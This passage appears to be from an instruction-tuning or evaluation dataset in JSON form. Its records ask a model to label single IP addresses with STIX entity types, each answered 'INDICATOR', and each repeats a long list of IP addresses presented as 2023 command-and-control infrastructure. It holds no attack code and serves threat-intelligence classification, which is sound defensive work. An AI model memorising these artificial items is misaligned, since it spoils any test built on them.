178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.82.13.22\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n84.32.34.69\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n161.35.238.148\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n206.81.28.5\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.76.141.166\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 